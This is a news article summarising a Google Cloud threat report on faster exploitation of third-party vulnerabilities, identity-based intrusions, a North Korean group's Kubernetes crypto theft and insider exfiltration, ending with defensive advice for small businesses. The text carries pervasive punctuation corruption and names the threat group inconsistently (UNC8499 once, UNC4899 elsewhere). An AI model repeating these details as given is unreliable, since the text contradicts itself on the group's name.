cloud attacks – A new Google Cloud Security report warns that the gap between discovering a vulnerability and attackers exploiting it has shrunk from weeks to days. With attacks increasingly aimed at unpatched third-party software and identity weaknesses, the report points to
For small and mid-sized businesses, the cloud has always promised speed. But lately, that speed has come with a darker twist: the time between a software flaw being disclosed and it being weaponized is collapsing.
Google Cloud Security’s March 2026 Cloud Threat Horizons Report. built on observations from the second half of 2025. found that “the window between vulnerability disclosure and mass exploitation collapsed by an order of magnitude. from weeks to days.” In other words. the usual rhythm of patching and hardening just isn’t keeping up.
The report’s message is blunt: the most reliable counterpunch won’t be a slower, manual process.. It will be defenses that can move automatically, with support from AI.. Google Cloud Security argues that organizations should “turning to more automatic defenses” because activity like probing targets for information and continued emphasis on data-focused theft suggests attackers are speeding up their workflow—and the safest response has to match it.
Those attacks don’t primarily go after the big, high-profile cloud platforms.. The report says threat actors are not targeting the core infrastructure of services like Google Cloud. Amazon Web Services. and Microsoft Azure. which are “well secured.” Instead. they’re exploiting unpatched vulnerabilities in third-party code—exactly the kind of detail most businesses struggle to track across libraries. plugins. and dependencies.
One example involved a critical remote code execution (RCE) vulnerability in React Server Components. a popular JavaScript library used to build user interfaces for websites and mobile apps.. Attacks began within 48 hours of the public disclosure of the vulnerability. listed as CVE-2025-55182 and commonly referred to as React2Shell.
Another case centered on an RCE flaw in the XWiki Platform (CVE-2025-24893).. Attackers could run arbitrary code on a remote server by sending a specific search string.. The bug was patched in June 2024, but the patch wasn’t widely deployed.. Exploitation kicked into high gear in November 2025, with attackers—including crypto mining gangs—using it in earnest.
The report also describes a high-stakes operation attributed to a state-sponsored group known as UNC4899, probably from North Korea.. The attackers took over Kubernetes workloads to steal millions of dollars in cryptocurrency. and the steps show how cloud compromise can start far from where the endgame happens.
In that account. UNC8499 targeted and lured an unsuspecting developer into downloading an archive file on the pretext of an open source project collaboration.. The developer then transferred the same file from their personal device to their corporate workstation over Airdrop.. Using an AI-assisted Integrated Development Environment (IDE). the victim interacted with the archive’s contents and eventually executed embedded malicious Python code.. That code spawned and executed a binary that masqueraded as the Kubernetes command-line tool.. The binary beaconed out to UNC4899-controlled domains and served as the backdoor that gave the threat actors access to the victim’s workstation—granting them a foothold into the corporate network.
Speed shows up again in another incident described by the report: attackers compromised a Node Package Manager package that stole a developer’s GitHub token.. They used that token to access Amazon Web Services. stole files stored in an AWS S3 bucket. and then destroyed the originals.. The entire sequence happened within 72 hours.
The report’s second major finding is that attackers are leaning harder into identity-related access failures rather than relying solely on brute-force attempts against weak credentials.. It breaks down how often different identity techniques appeared: 17% of cases involved voice-based social engineering, also known as vishing.. 12% relied on email phishing.. 21% involved compromised trusted relationships with third parties.. 21% involved actors leveraging stolen human and non-human identities.. 7% resulted from actors gaining access through improperly configured application and infrastructure assets.
And there’s a quieter, increasingly common threat running alongside the outside attacks: malicious insiders.. The report notes that employees, contractors, consultants, and interns were sending confidential data outside the organization.. The method is often platform-agnostic and consumer-focused, using services such as Google Drive, Dropbox, Microsoft OneDrive, and Apple iCloud.. The report calls this “the most rapidly growing means of exfiltrating data from an organization.”
Timing is part of the danger.. The report notes that attackers are increasingly taking their time before making their presence known.. It states that “45% of intrusions resulted in data theft without immediate extortion attempts at the time of the engagement. ” and that these were often characterized by prolonged dwell times and stealthy persistence.
So what should businesses do when the window for action is shrinking?
The report says each section includes recommendations for IT professionals to secure cloud infrastructure. split into specific advice for Google Cloud customers and broader guidance for customers using other platforms.. For organizations with security teams, those guidelines are meant to be folded into existing security measures.
For small and medium-sized businesses—where security staff may be thin or nonexistent—the report offers four concrete action items.. First, step up your patching game by ensuring all software applications, especially third-party apps, are automatically updated.. Second, strengthen Identity and Access Management using multi-factor authentication and ensuring only authorized users have access to administrative tools.. Third, monitor the network for unusual activity and data movement, including attacks from the outside and insider threats.. Fourth. have an incident response plan ready at the first sign of an intrusion. because the first few hours can be crucial—and if you’re not prepared. scrambling to assemble investigative and containment resources can take days.
If you don’t have security experts on staff, the report’s recommendation is direct: find a managed service provider with the skills and experience you need, and don’t start that search after an attacker has already succeeded.
cloud security Google Cloud Security Cloud Threat Horizons Report AI-augmented defenses vulnerability disclosure React Server Components React2Shell CVE-2025-55182 XWiki CVE-2025-24893 UNC4899 Kubernetes Node Package Manager IAM multi-factor authentication vishing email phishing incident response managed service provider